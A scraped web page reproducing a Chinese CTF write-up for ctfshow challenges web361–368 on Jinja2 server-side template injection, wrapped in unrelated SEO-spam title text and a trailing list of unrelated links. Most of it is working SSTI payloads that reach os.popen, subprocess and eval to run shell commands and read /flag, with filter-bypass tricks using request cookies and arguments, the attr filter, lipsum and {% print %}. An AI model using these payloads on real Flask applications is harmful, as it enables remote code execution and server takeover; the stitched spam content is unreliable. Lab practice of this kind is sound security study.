当前位置: 首页 > news >正文

南京医疗网站建设网站维护合同

南京医疗网站建设,网站维护合同,怎么用360做网站跳转,专业模板建站价格目录 1、web361 2、web362 3、web363 4、web364 5、web365 6、web366 7、web367 8、web368 1、web361 测试一下存在 SSTI 注入 方法很多 (1)使用子类可以直接调用的函数来打 payload1: ?name{{.__class__.__base__.__subclasses__…

目录

1、web361

2、web362

3、web363

4、web364

5、web365

6、web366

7、web367

8、web368


1、web361

测试一下存在 SSTI 注入

方法很多

(1)使用子类可以直接调用的函数来打

payload1:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

payload2: 

?name={{''.__class__.__base__.__subclasses__()[407]('cat /flag',shell=True,stdout=-1).communicate()[0].strip()}}

(2)使用重载函数

payload3:

?name={{''.__class__.__base__.__subclasses__()[290].__init__.__globals__['os'].popen('cat /flag').read()}}

payload4: 

?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

payload5: 

?name={{''.__class__.__base__.__subclasses__()[292].__init__.__globals__['linecache']['os'].popen('ls /').read()}}}}

(3)使用内嵌函数

payload6:

?name={{''.__class__.__base__.__subclasses__()[446].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}

对于这种没有过滤的,还有其他很多很多方法,这里就不列举了。

2、web362

开始过滤 

模糊测试看一下,过滤了 2 和 3 

随便拿个 payload 打吧:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

3、web363

过滤了单双引号

方法也很多,这里采用 get 传参绕过: 

?name={{().__class__.__base__.__subclasses__()[94][request.args.m1](0,request.args.m2)}}&m1=get_data&m2=/flag

4、web364

过滤了 args

并且 post 传参不允许

那就传给 cookie 吧

?name={{().__class__.__base__.__subclasses__()[94][request.cookies.m1](0,request.cookies.m2)}}
cookie传入:m1=get_data;m2=/flag

5、web365

新增过滤中括号

原本是在上面的 payload 上改,但是要连续用两次 [],有点问题,我们换个 payload: 

?name={{().__class__.__base__.__subclasses__().pop(290).__init__.__globals__.pop(request.cookies.m1).popen(request.cookies.m2).read()}}cookie:m1=os;m2=cat /flag

这个 payload 是一次性的,因为 pop 会删除里面的键,导致环境崩溃

更保险的是使用 __getitem__ ,方法同上

6、web366

新增过滤了下划线

前面的 payload 太长了,构造起来比较麻烦和乱

换个短点的 payload 结合过滤器绕过:

?name={{(lipsum|attr(request.cookies.m1)).os.popen(request.cookies.m2).read()}}
cookie:m1=__globals__;m2=cat /flag

7、web367

新增过滤 os

一起传给 cookie

?name={{(lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read()}}cookie:m1=__globals__;m2=cat /flag;m3=os

8、web368

双大括号中过滤了 request

但是 {% %} 中可用

payload:

?name={%print((lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read())%}cookie:m1=__globals__;m2=cat /flag;m3=os

http://www.wooajung.com/news/21126.html

相关文章:

  • 如何做搜索网站测试谷歌优化的最佳方案
  • 建站网站设计软文营销平台
  • wordpress配置数据库连接seo和sem的概念
  • 做宣传册网站中国职业培训在线
  • 外贸跨境电商网站建设开发竞价排名规则
  • wordpress子目录建站seo推广教程seo高级教程
  • 阅读推广联盟黑帽seo优化软件
  • 用来做微网站的企业网站模板下载
  • 受欢迎的常州做网站竞价推广论坛
  • wordpress 评论界面北京百度seo公司
  • 如何做品牌网站设计中国舆情网
  • 新建网站怎么做优化搜索引擎优化seo怎么做
  • 手机微信网站链接优化营商环境 提升服务效能
  • 模板免费下载官网百度站长工具seo查询
  • 国家开发银行助学贷款网站网站建设流程步骤
  • 用js做的网站seo技术学院
  • 企业做网站需要那些条件搜索引擎优化怎么做
  • 哪些网站可以上传自己做的视频淘宝店铺怎么推广和引流
  • 可以做微商的网站福州seo扣费
  • app开发网站建设百度域名注册
  • 南昌网站seo厂家seo搜索引擎优化课后答案
  • 网站 空间 购买快速排名优化公司
  • 南京网站快速排名提升郑州做网站推广电话
  • 哪些动物可以做网站名什么是竞价推广
  • 智能网站优化 cms 加盟互联网营销具体做什么
  • java做网站后台北京广告公司
  • 免费推广网站平台黄色seo优化服务商
  • 域名检测查询超级优化大师
  • 2019Wordpress中文主题互联网优化是什么意思
  • 网站内容做淘宝店铺链接影响排名吗b2b电子商务网站